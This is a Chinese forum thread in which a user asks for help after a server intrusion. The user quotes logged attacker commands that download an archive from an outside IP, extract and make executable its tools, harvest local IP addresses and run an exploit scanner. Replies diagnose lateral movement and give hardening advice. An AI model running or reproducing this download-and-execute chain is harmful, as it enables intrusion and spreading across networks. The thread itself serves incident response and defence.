This topic created in 1100 days ago, the information mentioned may be changed or developed.
自己的 Linux 服务器应该被攻击了,看日志查看到以下的执行命令
curl -O 167.235.199.99/.mini/.msq.tar;
tar xvf .msq.tar;
rm -rf .msq.tar ; cd .msq;
chmod +x *;
ip addr > .ipss ;
grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' .ipss > .regexout;
./exploitips
自己的显卡暂时还没有被征用
有大佬知道167.235.199.99/.mini/.msq.tar压缩包内可执行程序会干什么事情吗?(在虚拟机下尝试)
个人水平差,望赐教! 以及接下来该怎么做呢?重新安装系统?
 |
1
sheeta Apr 27, 2023  1
重装最好
|
 |
2
MoeMoesakura Apr 27, 2023 1
1.去丢在线沙盒里跑
2.建议重装,但是记得先看 last 跟 lastb ,记录一下 IP |
 |
3
JoshuaBen Apr 27, 2023 1
看起来是在横向移动扩散,找内网的其他资产
|
 |
4
CodeCodeStudy Apr 27, 2023 1
好像是尝试用弱口令扫码局域网 IP
|
 |
5
bjzhush Apr 27, 2023 1
 解压之后看到有这几个文件,基本上就是扫描、提权、大马这一类的,先把你重要数据备份到本地或者别的服务器吧 |
 |
6
Calen Apr 27, 2023 via iPhone 1
方便问一下您的服务器密码是什么吗?类似的例子就行。
|
 |
7
fantasticlw OP @Calen 因为要给朋友用,所以他们的就和用户名一致😕疏忽了
|
 |
8
1KTN90lKW9gVJ9vX Apr 27, 2023 via Android 1
关机,睡觉。
|
 |
9
namelesswryyy Apr 28, 2023 via Android 1
找运行中的程序位置,有没有奇怪的 path
有专门做 process 名伪装的,能伪装名字但位置能看到 找 crontab 有没有奇怪的定时任务 封掉漏洞后,处理完再观察一段时间 如果还有,可能就是系统文件被替换了 建议把东西移走,重做 但这种情况不太多 |
 |
10
JensenQian Apr 28, 2023 via Android 1
密钥登录,别用密码
|
 |
11
feng0vx Apr 28, 2023 via iPhone 1
重装,换密钥登陆,禁用 root 登陆,密码 uuid 生成
|
 |
12
dode Apr 28, 2023 1
|
|
13
dode Apr 28, 2023
备份数据,重装系统,禁用 ssh 密码登陆
|
 |
14
xiaoqiao24 Apr 28, 2023
@dode 是不是可以添加大写呢 或者加个开关支持大写?
|
 |
15
documentzhangx66 Apr 28, 2023
楼主思路完全搞错了。
1.重装。 2.没必要禁用 root ,也没必要换秘钥登录。root 使用至少 16 位复杂密码,包含数字、字符、大小写字母。 3.安装 fail2ban 。 4.常见服务,比如 nginx 、mysql ,不要直接暴露端口到公网,要过一遍防火墙与 WAF 。 5.如果没有防火墙与 WAF ,那就用 WireGuard 给服务器组加密虚拟网络,需要使用服务器的电脑,在 WireGuard 网络里访问服务器。 6.服务器 SSH 端口,要做白名单,仅允许认识的 IP 地址连接。 |
 |
16
dogking2 Apr 28, 2023 1
|
 |
17
salmon5 Apr 28, 2023
root+至少 20 位的 大小写+数字 随机密码,能避免 99.99%的攻击
|
|
18
dode Apr 28, 2023
@xiaoqiao24 这是我自用的,代码也很简单,一个 html 文件,你可以存一个自己改,一般要求大写的服务就换一下首个字母,现在浏览器也支持自动生成密码.
|
Select Language